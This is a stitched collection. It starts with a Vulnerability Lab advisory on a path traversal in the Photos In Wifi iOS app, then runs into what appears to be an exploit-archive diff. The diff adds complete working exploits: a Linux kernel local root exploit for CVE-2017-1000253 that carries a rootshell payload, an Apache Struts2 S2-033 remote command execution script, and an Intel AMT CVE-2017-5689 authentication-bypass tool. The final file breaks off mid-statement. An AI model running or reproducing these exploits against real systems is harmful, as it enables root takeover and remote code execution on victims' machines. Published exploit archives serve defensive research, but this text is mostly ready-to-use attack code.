http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2018-01-04
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
6.5
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, and album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing 100`s of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiples full resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a path traversal web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2018-01-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An directory traversal web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to unauthorized access other the mobile application folders to compromise
by an upload of malicious contents.
The vulnerability is located in `Select a photo or a video to upload` module. Remote attackers are able to intercept the vulnerable
filename value in the upload - submit POST method request to compromise the mobile app. The encoding of the ext value and the parse
of the filename value is broken which results obviously in this unexpected behavior. The injection point of the issue is the upload
POST method request with the vulnerable filename value. The execution point occurs in the assets.php file when processing to display
the images or videos.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account.
Successful exploitation of the file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and login by requesting via http localhost
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject to the filename value with a payload and path as extension
7. Continue to reply the request
8. The server responds with 200OK
9. Open the poc url of the path to execute the malicious content to compromise
10. Successful reproduce of the vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=[../not_allowed_directory/].[ext]
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="../not_allowed_directory/newfile.[ext]"
-
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Security Risk:
==============
The security risk of the web vulnerability in the wifi interface upload post method request is estimated as high (CVSS 6.5).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

2
exploits/linux/dos/22527.c
View file

@ -1,3 +1,4 @@
/*
source: http://www.securityfocus.com/bid/7410/info
Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability.
@ -7,6 +8,7 @@ It has been reported that a specifically crafted HTTP request containing malicio
Although unconfirmed, this issue may be exploited to execute arbitrary code.
It should also be noted, that although this vulnerability has been reported to affect Xeneo web server version 2.2.10.0 previous versions may also be vulnerable.
*/
/* Xeneo Web Server 2.2.2.10.0 DoS
*

476
exploits/linux/local/42887.c Normal file
View file

@ -0,0 +1,476 @@
/*
* CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions
* 3.10.0-514.21.2.el7.x86_64 and 3.10.0-514.26.1.el7.x86_64
* Copyright (C) 2017 Qualys, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* E-DB Note: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
* E-DB Note: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
* E-DB Note: http://seclists.org/oss-sec/2017/q3/541
*/
/**
cat > rootshell.c << "EOF"
#define _GNU_SOURCE
#include <linux/capability.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define die() exit(__LINE__)
static void __attribute__ ((constructor)) status(void) {
if (dup2(STDIN_FILENO, STDOUT_FILENO) != STDOUT_FILENO) die();
if (dup2(STDIN_FILENO, STDERR_FILENO) != STDERR_FILENO) die();
const pid_t pid = getpid();
if (pid <= 0) die();
printf("Pid:\t%zu\n", (size_t)pid);
uid_t ruid, euid, suid;
gid_t rgid, egid, sgid;
if (getresuid(&ruid, &euid, &suid)) die();
if (getresgid(&rgid, &egid, &sgid)) die();
printf("Uid:\t%zu\t%zu\t%zu\n", (size_t)ruid, (size_t)euid, (size_t)suid);
printf("Gid:\t%zu\t%zu\t%zu\n", (size_t)rgid, (size_t)egid, (size_t)sgid);
static struct __user_cap_header_struct header;
if (capget(&header, NULL)) die();
if (header.version <= 0) die();
header.pid = pid;
static struct __user_cap_data_struct data[2];
if (capget(&header, data)) die();
printf("CapInh:\t%08x%08x\n", data[1].inheritable, data[0].inheritable);
printf("CapPrm:\t%08x%08x\n", data[1].permitted, data[0].permitted);
printf("CapEff:\t%08x%08x\n", data[1].effective, data[0].effective);
fflush(stdout);
for (;;) sleep(10);
die();
}
EOF
gcc -fpic -shared -nostartfiles -Os -s -o rootshell rootshell.c
xxd -i rootshell > rootshell.h
**/
#define _GNU_SOURCE
#include <elf.h>
#include <fcntl.h>
#include <link.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define mempset(_s, _c, _n) (memset((_s), (_c), (_n)) + (_n))
#define PAGESZ ((size_t)4096)
#define STACK_ALIGN ((size_t)16)
#define SUB_STACK_RAND ((size_t)8192)
#define SAFE_STACK_SIZE ((size_t)24<<10)
#define MAX_ARG_STRLEN ((size_t)128<<10)
#define INIT_STACK_EXP (131072UL)
#define STACK_GUARD_GAP (1UL<<20)
#define MIN_GAP (128*1024*1024UL + (((-1UL) & 0x3fffff) << 12))
#define LDSO "/lib64/ld-linux-x86-64.so.2"
#define LDSO_OFFSET ((size_t)0x238)
#define die() do { \
printf("died in %s: %u\n", __func__, __LINE__); \
exit(EXIT_FAILURE); \
} while (0)
static const ElfW(auxv_t) * my_auxv;
static unsigned long int
my_getauxval (const unsigned long int type)
{
const ElfW(auxv_t) * p;
if (!my_auxv) die();
for (p = my_auxv; p->a_type != AT_NULL; p++)
if (p->a_type == type)
return p->a_un.a_val;
die();
}
struct elf_info {
uintptr_t rx_start, rx_end;
uintptr_t rw_start, rw_end;
uintptr_t dynamic_start;
uintptr_t data_start;
};
static struct elf_info
get_elf_info(const char * const binary)
{
struct elf_info elf;
memset(&elf, 0, sizeof(elf));
const int fd = open(binary, O_RDONLY);
if (fd <= -1) die();
struct stat st;
if (fstat(fd, &st)) die();
if (!S_ISREG(st.st_mode)) die();
if (st.st_size <= 0) die();
#define SAFESZ ((size_t)64<<20)
if (st.st_size >= (ssize_t)SAFESZ) die();
const size_t size = st.st_size;
uint8_t * const buf = malloc(size);
if (!buf) die();
if (read(fd, buf, size) != (ssize_t)size) die();
if (close(fd)) die();
if (size <= LDSO_OFFSET + sizeof(LDSO)) die();
if (memcmp(buf + LDSO_OFFSET, LDSO, sizeof(LDSO))) die();
if (size <= sizeof(ElfW(Ehdr))) die();
const ElfW(Ehdr) * const ehdr = (const ElfW(Ehdr) *)buf;
if (ehdr->e_ident[EI_MAG0] != ELFMAG0) die();
if (ehdr->e_ident[EI_MAG1] != ELFMAG1) die();
if (ehdr->e_ident[EI_MAG2] != ELFMAG2) die();
if (ehdr->e_ident[EI_MAG3] != ELFMAG3) die();
if (ehdr->e_ident[EI_CLASS] != ELFCLASS64) die();
if (ehdr->e_ident[EI_DATA] != ELFDATA2LSB) die();
if (ehdr->e_type != ET_DYN) die();
if (ehdr->e_machine != EM_X86_64) die();
if (ehdr->e_version != EV_CURRENT) die();
if (ehdr->e_ehsize != sizeof(ElfW(Ehdr))) die();
if (ehdr->e_phentsize != sizeof(ElfW(Phdr))) die();
if (ehdr->e_phoff <= 0 || ehdr->e_phoff >= size) die();
if (ehdr->e_phnum > (size - ehdr->e_phoff) / sizeof(ElfW(Phdr))) die();
unsigned int i;
for (i = 0; i < ehdr->e_phnum; i++) {
const ElfW(Phdr) * const phdr = (const ElfW(Phdr) *)(buf + ehdr->e_phoff) + i;
if (phdr->p_type != PT_LOAD) continue;
if (phdr->p_offset >= size) die();
if (phdr->p_filesz > size - phdr->p_offset) die();
if (phdr->p_filesz > phdr->p_memsz) die();
if (phdr->p_vaddr != phdr->p_paddr) die();
if (phdr->p_vaddr >= SAFESZ) die();
if (phdr->p_memsz >= SAFESZ) die();
if (phdr->p_memsz <= 0) die();
if (phdr->p_align != 2 * STACK_GUARD_GAP) die();
const uintptr_t start = phdr->p_vaddr & ~(PAGESZ-1);
const uintptr_t end = (phdr->p_vaddr + phdr->p_memsz + PAGESZ-1) & ~(PAGESZ-1);
if (elf.rw_end) die();
switch (phdr->p_flags) {
case PF_R | PF_X:
if (elf.rx_end) die();
if (phdr->p_vaddr) die();
elf.rx_start = start;
elf.rx_end = end;
break;
case PF_R | PF_W:
if (!elf.rx_end) die();
if (start <= elf.rx_end) die();
elf.rw_start = start;
elf.rw_end = end;
break;
default:
die();
}
}
if (!elf.rx_end) die();
if (!elf.rw_end) die();
uintptr_t _dynamic = 0;
uintptr_t _data = 0;
uintptr_t _bss = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
const ElfW(Shdr) * const shdr = (const ElfW(Shdr) *)(buf + ehdr->e_shoff) + i;
if (!(shdr->sh_flags & SHF_ALLOC)) continue;
if (shdr->sh_addr <= 0 || shdr->sh_addr >= SAFESZ) die();
if (shdr->sh_size <= 0 || shdr->sh_size >= SAFESZ) die();
#undef SAFESZ
const uintptr_t start = shdr->sh_addr;
const uintptr_t end = start + shdr->sh_size;
if (!(shdr->sh_flags & SHF_WRITE)) {
if (start < elf.rw_end && end > elf.rw_start) die();
continue;
}
if (start < elf.rw_start || end > elf.rw_end) die();
if (_bss) die();
switch (shdr->sh_type) {
case SHT_PROGBITS:
if (start <= _data) die();
_data = start;
break;
case SHT_NOBITS:
if (!_data) die();
_bss = start;
break;
case SHT_DYNAMIC:
if (shdr->sh_entsize != sizeof(ElfW(Dyn))) die();
if (_dynamic) die();
_dynamic = start;
/* fall through */
default:
_data = 0;
break;
}
}
elf.dynamic_start = _dynamic;
elf.data_start = _data;
if (!_dynamic) die();
if (!_data) die();
if (!_bss) die();
free(buf);
return elf;
}
int
main(const int my_argc, const char * const my_argv[], const char * const my_envp[])
{
{
const char * const * p = my_envp;
while (*p++) ;
my_auxv = (const void *)p;
}
if (my_getauxval(AT_PAGESZ) != PAGESZ) die();
{
const char * const platform = (const void *)my_getauxval(AT_PLATFORM);
if (!platform) die();
if (strcmp(platform, "x86_64")) die();
}
if (my_argc != 2) {
printf("Usage: %s binary\n", my_argv[0]);
die();
}
const char * const binary = realpath(my_argv[1], NULL);
if (!binary) die();
if (*binary != '/') die();
if (access(binary, R_OK | X_OK)) die();
const struct elf_info elf = get_elf_info(binary);
if (elf.rx_start) die();
if (sizeof(ElfW(Dyn)) != STACK_ALIGN) die();
if (elf.dynamic_start % STACK_ALIGN != STACK_ALIGN / 2) die();
const uintptr_t arg_start = elf.rx_end + 2 * STACK_GUARD_GAP + INIT_STACK_EXP + PAGESZ-1;
if (arg_start >= elf.rw_end) die();
const size_t argv_size = (arg_start - elf.data_start) - (SAFE_STACK_SIZE + 8*8+22*2*8+16+4*STACK_ALIGN + SUB_STACK_RAND);
printf("argv_size %zu\n", argv_size);
if (argv_size >= arg_start) die();
const size_t arg0_size = elf.rw_end - arg_start;
if (arg0_size % PAGESZ != 1) die();
const size_t npads = argv_size / sizeof(char *);
if (npads <= arg0_size) die();
const size_t smash_size = (elf.data_start - elf.rw_start) + SAFE_STACK_SIZE + SUB_STACK_RAND;
if (smash_size >= (elf.rw_start - elf.rx_end) - STACK_GUARD_GAP) die();
if (smash_size + 1024 >= MAX_ARG_STRLEN) die();
printf("smash_size %zu\n", smash_size);
const size_t hi_smash_size = (SAFE_STACK_SIZE * 3 / 4) & ~(STACK_ALIGN-1);
printf("hi_smash_size %zu\n", hi_smash_size);
if (hi_smash_size <= STACK_ALIGN) die();
if (hi_smash_size >= smash_size) die();
const size_t lo_smash_size = (smash_size - hi_smash_size) & ~(STACK_ALIGN-1);
printf("lo_smash_size %zu\n", lo_smash_size);
if (lo_smash_size <= STACK_ALIGN) die();
#define LD_DEBUG_ "LD_DEBUG="
static char foreground[MAX_ARG_STRLEN];
{
char * cp = stpcpy(foreground, LD_DEBUG_);
cp = mempset(cp, 'A', hi_smash_size - 16);
cp = mempset(cp, ' ', 1);
cp = mempset(cp, 'A', 24);
cp = mempset(cp, ' ', 1);
cp = mempset(cp, 'A', 1);
cp = mempset(cp, ' ', DT_SYMTAB + 16 - (24+1 + 1 + DT_NEEDED) % 16);
cp = mempset(cp, 'A', 80);
cp = mempset(cp, ' ', 16);
cp = mempset(cp, 'A', 31);
cp = mempset(cp, ' ', 1);
cp = mempset(cp, 'A', 1);
cp = mempset(cp, ' ', DT_NEEDED + 16 - (31+1 + 1 + DT_STRTAB) % 16);
cp = mempset(cp, 'A', 80);
cp = mempset(cp, ' ', 16);
cp = mempset(cp, 'A', 31);
cp = mempset(cp, ' ', 1);
cp = mempset(cp, 'A', 1);
cp = mempset(cp, ' ', DT_STRTAB + 16 - (31+1 + 1 + 1 + strlen(binary)+1 + sizeof(void *)) % 16);
cp = mempset(cp, 'A', lo_smash_size - 16);
if (cp >= foreground + sizeof(foreground)) die();
if (cp <= foreground) die();
if (*cp) die();
if (strlen(foreground) != (size_t)(cp - foreground)) die();
}
static char background[MAX_ARG_STRLEN];
{
char * cp = stpcpy(background, LD_DEBUG_);
cp = mempset(cp, 'L', lo_smash_size);
size_t i;
for (i = 0; i < (32 + 48 + 96) / sizeof(uint64_t); i++) {
const uint64_t strtab = 0x8888888888888888UL + 0;
cp = mempcpy(cp, &strtab, sizeof(uint64_t));
}
for (i = 0; i < (32 + 48 + 96) / sizeof(uint64_t); i++) {
const uint64_t needed = 0x7777777777777778UL + LDSO_OFFSET+1;
cp = mempcpy(cp, &needed, sizeof(uint64_t));
}
cp = mempset(cp, 'H', 32 + 48 + hi_smash_size - 16);
if (cp >= background + sizeof(background)) die();
if (cp <= background) die();
if (*cp) die();
if (strlen(background) != (size_t)(cp - background)) die();
if (strlen(background) != strcspn(background, " ,:")) die();
}
static char pad[MAX_ARG_STRLEN];
memset(pad, ' ', sizeof(pad)-1);
if (pad[sizeof(pad)-1]) die();
if (strlen(pad) != sizeof(pad)-1) die();
if (sizeof(pad) % STACK_ALIGN) die();
{
double probability = npads * sizeof(pad) - (128<<20);
probability *= probability / 2;
probability /= (16UL<<30);
probability /= ( 1UL<<40);
printf("probability 1/%zu\n", (size_t)(1 / probability));
}
static char arg0[MAX_ARG_STRLEN];
if (arg0_size >= sizeof(arg0)) die();
if (arg0_size <= 0) die();
memset(arg0, ' ', arg0_size-1);
static char arg2[MAX_ARG_STRLEN];
const size_t nargs = 3 + npads - (arg0_size-1);
char ** const argv = calloc(nargs + 1, sizeof(char *));
if (!argv) die();
{
char ** ap = argv;
*ap++ = arg0;
*ap++ = "--help";
*ap++ = arg2;
size_t n;
for (n = ap - argv; n < nargs; n++) {
*ap++ = pad;
}
if (ap != argv + nargs) die();
if (*ap) die();
}
const size_t nenvs = 2 + arg0_size-1;
char ** const envp = calloc(nenvs + 1, sizeof(char *));
if (!envp) die();
{
char ** ep = envp;
*ep++ = background;
*ep++ = foreground;
size_t n;
for (n = ep - envp; n < nenvs; n++) {
*ep++ = pad;
}
if (ep != envp + nenvs) die();
if (*ep) die();
}
{
size_t len = strlen(binary)+1 + sizeof(void *);
char * const * const __strpp[] = { argv, envp, NULL };
char * const * const * strpp;
for (strpp = __strpp; *strpp; strpp++) {
char * const * strp;
for (strp = *strpp; *strp; strp++) {
len += strlen(*strp) + 1;
}
}
len = 1 + PAGESZ - len % PAGESZ;
memset(arg2, ' ', len);
}
{
if (npads * sizeof(pad) + (1<<20) >= MIN_GAP / 4) die();
const struct rlimit rlimit_stack = { MIN_GAP, MIN_GAP };
if (setrlimit(RLIMIT_STACK, &rlimit_stack)) die();
}
const int dev_null = open("/dev/null", O_WRONLY);
if (dev_null <= -1) die();
{
static char ldso[] = "." LDSO;
char * const slash = strrchr(ldso, '/');
if (!slash) die();
*slash = '\0';
mkdir(ldso, 0755);
*slash = '/';
const int fd = open(ldso, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0755);
if (fd <= -1) die();
static const
#include "rootshell.h"
if (write(fd, rootshell, rootshell_len) != (ssize_t)rootshell_len) die();
if (close(fd)) die();
}
size_t try;
for (try = 1; try; try++) {
if (fflush(stdout)) die();
const pid_t pid = fork();
if (pid <= -1) die();
if (pid == 0) {
if (dup2(dev_null, STDOUT_FILENO) != STDOUT_FILENO) die();
if (dup2(dev_null, STDERR_FILENO) != STDERR_FILENO) die();
if (dev_null > STDERR_FILENO) if (close(dev_null)) die();
execve(binary, argv, envp);
die();
}
int status = 0;
struct timeval start, stop, diff;
if (gettimeofday(&start, NULL)) die();
if (waitpid(pid, &status, WUNTRACED) != pid) die();
if (gettimeofday(&stop, NULL)) die();
timersub(&stop, &start, &diff);
printf("try %zu %ld.%06ld ", try, diff.tv_sec, diff.tv_usec);
if (WIFSIGNALED(status)) {
printf("signal %d\n", WTERMSIG(status));
switch (WTERMSIG(status)) {
case SIGKILL:
case SIGSEGV:
case SIGBUS:
break;
default:
die();
}
} else if (WIFEXITED(status)) {
printf("exited %d\n", WEXITSTATUS(status));
} else if (WIFSTOPPED(status)) {
printf("stopped %d\n", WSTOPSIG(status));
die();
} else {
printf("unknown %d\n", status);
die();
}
}
die();
}

145
exploits/multiple/remote/43382.py Executable file
View file

@ -0,0 +1,145 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import random
import base64
upperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lowerAlpha = "abcdefghijklmnopqrstuvwxyz"
numerals = "0123456789"
allchars = [chr(_) for _ in xrange(0x00, 0xFF + 0x01)]
def rand_base(length, bad, chars):
'''generate a random string with chars collection'''
cset = (set(chars) - set(list(bad)))
if len(cset) == 0:
return ""
chars = [list(cset)[random.randrange(len(cset))] for i in xrange(length)]
chars = map(str, chars)
return "".join(chars)
def rand_char(bad='', chars=allchars):
'''generate a random char with chars collection'''
return rand_base(1, bad, chars)
def rand_text(length, bad='', chars=allchars):
'''generate a random string (cab be with unprintable chars)'''
return rand_base(length, bad, chars)
def rand_text_alpha(length, bad=''):
'''generate a random string with alpha chars'''
chars = upperAlpha + lowerAlpha
return rand_base(length, bad, set(chars))
def rand_text_alpha_lower(length, bad=''):
'''generate a random lower string with alpha chars'''
return rand_base(length, bad, set(lowerAlpha))
def rand_text_alpha_upper(length, bad=''):
'''generate a random upper string with alpha chars'''
return rand_base(length, bad, set(upperAlpha))
def rand_text_alphanumeric():
'''generate a random string with alpha and numerals chars'''
chars = upperAlpha + lowerAlpha + numerals
return rand_base(length, bad, set(chars))
def rand_text_numeric(length, bad=''):
'''generate a random string with numerals chars'''
return rand_base(length, bad, set(numerals))
def generate_rce_payload(code):
'''generate apache struts2 s2-033 payload.
'''
payload = ""
payload += requests.utils.quote("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload += ","
payload += requests.utils.quote(code)
payload += ","
payload += requests.utils.quote("#xx.toString.json")
payload += "?"
payload += requests.utils.quote("#xx:#request.toString")
return payload
def check(url):
'''check if url is vulnerable to apache struts2 S2-033.
'''
var_a = rand_text_alpha(4)
var_b = rand_text_alpha(4)
flag = rand_text_alpha(5)
addend_one = int(rand_text_numeric(2))
addend_two = int(rand_text_numeric(2))
addend_sum = addend_one + addend_two
code = "#{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code += "#{var_a}.print(#parameters.{var_b}[0]),"
code += "#{var_a}.print(new java.lang.Integer({addend_one}+{addend_two})),"
code += "#{var_a}.print(#parameters.{var_b}[0]),"
code += "#{var_a}.close()"
payload = generate_rce_payload(code.format(
var_a=var_a, var_b=var_b, addend_one=addend_one, addend_two=addend_two
))
url = url + "/" + payload
resp = requests.post(url, data={ var_b: flag }, timeout=8)
vul_flag = "{flag}{addend_sum}{flag}".format(flag=flag, addend_sum=addend_sum)
if resp and resp.status_code == 200 and vul_flag in resp.text:
return True, resp.text
return False, ''
def exploit(url, cmd):
'''exploit url with apache struts2 S2-033.
'''
var_a = rand_text_alpha(4)
var_b = rand_text_alpha(4) # cmd
code = "#{var_a}=new sun.misc.BASE64Decoder(),"
# code += "@java.lang.Runtime@getRuntime().exec(new java.lang.String(#{var_a}.decodeBuffer(#parameters.{var_b}[0])))" # Error 500
code += "#wr=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
code += "#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(new java.lang.String(#{var_a}.decodeBuffer(#parameters.{var_b}[0])))),"
code += "#wr.println(#rs),#wr.flush(),#wr.close()"
payload = generate_rce_payload(code.format(
var_a=var_a, var_b=var_b
))
url = url + "/" + payload
requests.post(url, data={ var_b: base64.b64encode(cmd) }, timeout=8)
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("[*] python {} <url> <cmd>".format(sys.argv[0]))
sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
print(check(url))
exploit(url, cmd)
## References
# 1. https://github.com/rapid7/metasploit-framework/pull/6945

194
exploits/multiple/remote/43385.py Executable file
View file

@ -0,0 +1,194 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-5689 = {
# dork="Server: Intel(R) Active Management Technology" port:"16992",
# ports=[
# 623,
# 664,
# 16992,
# 16993,
# 16994,
# 16995
# ]
# products=[
# Active Management Technology (AMT),
# Intel Standard Manageability (ISM),
# Intel Small Business Technology (SBT)
# ]
# version=[
# 6.x,
# 7.x,
# 8.x,
# 9.x,
# 10.x,
# 11.0,
# 11.5,
# 11.6
# ]
import functools
import requests
import logging
import uuid
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__file__)
TIMEOUT = 8
def handle_exception(func):
functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except Exception as err:
log.error(err)
return False
return wrapper
def intel_vulnerable_product(server):
status = False
products = [
'Intel(R) Active Management Technology',
'Intel(R) Standard Manageability',
'Intel(R) Small Business Technology',
'AMT'
]
results = map(lambda x: x in server, products)
status = True if (True in results) else False
return status
@handle_exception
def exploit_web_interface(host, port):
status = False
url = "http://{host}:{port}/index.htm".format(host=host, port=port)
headers = {"User-Agent": "Mozilla/5.0"}
httprsp = requests.get(url, headers=headers, timeout=TIMEOUT)
if not intel_vulnerable_product(httprsp.headers['Server']): return status
"""
GET /index.htm HTTP/1.1
Host: 192.168.1.100:16992
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:7BA70000000000000000000000000000", nonce="/tsfAAYGAADdx+TCLSlXsW7FN7GY/hf7",stale="false",qop="auth"
Content-Type: text/html
Server: Intel(R) Active Management Technology 8.1.40
Content-Length: 689
Connection: close
"""
www_authenticate = httprsp.headers.get('WWW-Authenticate')
www_authenticate = www_authenticate.replace(
'stale="false"',
'username=admin,response=,uri=/index.htm,nc=00000001,cnonce=60513ab58858482c'
)
headers.update({"Authorization": www_authenticate})
httprsp = requests.get(url, headers=headers, timeout=TIMEOUT)
if not httprsp: return status
if not httprsp.headers: return status
if not intel_vulnerable_product(httprsp.headers['Server']): return status
if httprsp.status_code == 200: status = True
"""
GET /index.htm HTTP/1.1
Host: 192.168.1.100:16992
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.13.0
Authorization: Digest realm="Digest:7BA70000000000000000000000000000", nonce="/tsfAAYGAADdx+TCLSlXsW7FN7GY/hf7",username=admin,response=,uri=/index.htm,nc=00000001,cnonce=60513ab58858482c,qop="auth"
HTTP/1.1 200 OK
Date: Sat, 6 May 2017 03:24:33 GMT
Server: Intel(R) Active Management Technology 8.1.40
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT
04A9
"""
return status
@handle_exception
def exploit_wsman(host, port):
status = False
url = "http://{host}:{port}/wsman".format(host=host, port=port)
soap = (
'<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tns="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wscat="http://schemas.xmlsoap.org/ws/2005/06/wsmancat" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration">'
' <soap:Header>'
' <wsa:To>{url}</wsa:To>'
' <wsa:ReplyTo>'
' <wsa:Address soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>'
' </wsa:ReplyTo>'
' <wsa:Action soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</wsa:Action>'
' <wsman:MaxEnvelopeSize soap:mustUnderstand="true">51200</wsman:MaxEnvelopeSize>'
' <wsa:MessageID>uuid:{uuid}</wsa:MessageID>'
' <wsman:ResourceURI soap:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity</wsman:ResourceURI>'
' <wsman:SelectorSet>'
' <wsman:Selector Name="InstanceID">AMT FW Core Version</wsman:Selector>'
' </wsman:SelectorSet>'
' <wsman:OperationTimeout>PT60.000S</wsman:OperationTimeout>'
' </soap:Header>'
' <soap:Body />'
'</soap:Envelope>'
).format(url=url, uuid=str(uuid.uuid4()))
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/soap+xml; charset=UTF-8"}
httprsp = requests.post(url, data=soap, headers=headers, timeout=TIMEOUT)
if not intel_vulnerable_product(httprsp.headers['Server']): return status
www_authenticate = httprsp.headers.get('WWW-Authenticate')
www_authenticate = www_authenticate.replace(
'stale="false"',
'username=admin,response=,uri=/index.htm,nc=00000001,cnonce=60513ab58858482c'
)
headers.update({"Authorization": www_authenticate})
httprsp = requests.post(url, data=soap, headers=headers, timeout=TIMEOUT)
if not httprsp: return status
if not httprsp.headers: return status
if not intel_vulnerable_product(httprsp.headers['Server']): return status
if httprsp.status_code == 200: status = True
return status
if __name__ == "__main__":
import sys
if len(sys.argv) != 3:
log.info("[+] Usage: python {} <host> <port>".format(sys.argv[0]))
sys.exit(1)
host, port = sys.argv[1], sys.argv[2]
if exploit_web_interface(host, port) or exploit_wsman(host, port):
